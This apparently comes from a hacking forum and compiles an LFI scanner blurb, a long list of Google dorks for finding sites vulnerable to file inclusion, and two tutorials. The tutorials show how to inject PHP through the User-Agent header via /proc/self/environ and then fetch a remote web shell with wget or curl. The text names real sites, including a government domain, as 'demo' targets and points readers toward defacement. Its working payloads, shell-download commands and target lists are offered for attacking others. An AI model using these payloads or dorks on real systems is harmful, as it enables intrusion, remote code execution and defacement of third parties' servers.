PHP : LFI server Scanner by Lagripe-Dz

 LFI ServerScanner

 

Scan Server Site Trying 2 Find LFI bug

Tool w0rk with 2 marks

first : [ daemon ] it's in /etc/passwd file

second : [ failed to open stream ] when there's opening error in the page

this's result pic :

it's easy 2 use

Download Video

from h3r3

Google Dorks For RFI & LFI -Sundaravel

    inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk



    INURL OR ALLINURL WITH:


    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


    allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    allinurl:ihm.php?p=

    Keyword : "powered by AllMyLinks"
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    keyword : "Powered by phpBB 2.0.6"
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    keyword : "powered by CubeCart 3.0.6"
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    keyword : "powered by paBugs 2.0 Beta 3"
    /class.mysql.php?path_to_bt_dir=

    allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php/ashnews.php?pathtoashnews=

    keyword : /phorum/login.php/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    allinurl:ihm.php?p=*

    keyword : "powered eyeOs"
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

    allinurl:.php?bodyfile=

    allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    allinurl:forums.html/modules.php?name=

    allinurl:/default.php?page=home

    allinurl:/folder.php?id=

    allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    allinurl:phpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    key word : "powered by Fantastic News v2.1.2"
    /archive.php?CONFIG[script_path]=

    keyword: "powered by smartblog" AND inurl:?page=login
    /index.php?page=

    allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    keyword:"Powered By FusionPHP"
    /templates/headline_temp.php?nst_inc=

    allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    keyword : "Powered by iUser"
    /common.php?include_path=

    allinurl: "static.php?load="
    /static.php?load=

    keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=

    inurl:"/lire.php?rub="

    inurl:"/os/pointer.php?url="

    inurl:"folder.php?id="

    inurl:"show.php?page="

    inurl:"index2.php?DoAction="

    inurl:"index.php?canal="

    inurl:"index.php?screen="

    inurl:"index.php?langc="

    inurl:"index.php?Language="

    inurl:"view.php?page="

    dork: "powered by doodle cart"
    rfi of this dork: enc/content.php?Home_Path=

    dork: "Login to Calendar"
    rfi of this dork: /embed/day.php?path=

    dork: "powered by EQdkp"
    rfi of this dork: /includes/dbal.php?eqdkp_root_path=

    inurl:"template.php?goto="

    inurl:"video.php?content="

    inurl:"pages.php?page="

    inurl:"index1.php?choix="

    inurl:"index1.php?menu="

    inurl:"index2.php?ascii_seite="

    dork: inurl:surveys
    rfi to this dork: /surveys/survey.inc.php?path=

    inurl:"index.php?body="

    dork: allinurl:adobt sitel
    rfi to this dork: /classes/adodbt/sql.php?classes_dir=

    dork: "Powered By ScozNews"
    rfi to this dork: /sources/functions.php?CONFIG[main_path]=
    rfi to this dork: /sources/template.php?CONFIG[main_path]=

    inurl:"kb_constants.php?module_root_path="

    dork: allinurl:"mcf.php"
    rfi to this dork: /mcf.php?content=

    dork: inurl:"main.php?sayfa="
    rfi to this dork: /main.php?sayfa=

    dork: "MobilePublisherPHP"
    rfi to this dork: /header.php?abspath=

    dork: "powered by phpCOIN 1.2.3"
    rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

    allinurl:login.php?dir=

    inurl:"index.php?go="

    inurl:"index1.php?="

    inurl:"lib/gore.php?libpath="

    inurl:"index2.php?p="

LFI ( Local File Inclusion ) Website hacking Tutorial -Sundaravel

 

Lets Starts 

Few Things You Need to Start 

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/
4) Mozilla Firefox Browser 


First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:

http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agentGo to New > New User-Agent
You will get something like this:

<?php phpinfo();?>

Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.
You should get something like this in your site.

Now search for "disable_functions" (Ctrl+F Search function)
Mine is

disable_functions     | no value    | no value

That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.

Demo websites :)

http://hwcf.com.pk/golf/index.php?page=....lf/environ
http://www.lrh.gov.pk/Nursing_School/ind...lf/environ
http://www.aladde.org/index.php?load=../...lf/environ
http://www.findinsl.com/index.php?load=....lf/environ
http://www.holzprof.ee/index.php?action=...lf/environ
http://www.bislig.gov.ph/content1.php?pa...lf/environ
http://www.tendokarate.no/index.php?page...lf/environ
http://www.cranberries-gifts.co.uk/categ...lf/environ

LFI and Shell Upload with Tamper Data

LFI  vulnerable website URL looks  like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code looks like that makes it vulnerable.

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
  include("pages/$file");
   }
   else
   {
  include("index.php");
   }
   ?>

Few Things You Need for this Method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now i'm showing  how to exploit LFI and upload your shell via /proc/self/environ using Tamper data


So after selecting a vulnrable website, check /etc/passwd.
Your page should come up with something that looks like this.



 

 Full size Image : click here

Great !!, now you are sure  that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look  like this if the file exists,
Note - not all websites have it.



Full size image : Click here

i'm interested in,  HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.


To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.

 


Now you will got a  window looks like this.




your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.


 i'll try some code injection.
After start tampering, you should see a window  looks  like this



Full size image : Click Here



In the User-Agent field, type this 


<?php phpinfo();?>


Now vulnrable website is down loading, 
you will see something like this if you did it correctly

Full size Image : click here

Now we can execute code, so let's upload upload your shell 


Open TamperData again, click start tamper, and refresh  website. and This time in the User-Agent enter this


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this

Full size image : Click here

it downloads  text file, and renames it as a php file 
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


when you're done with that, you can access your shell directly by going to http://site/shell.php


If you getting an error, try using the same method as when you got your 
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done, you have a  shell, like this <3

Full size Image : Click Here

Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
 your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd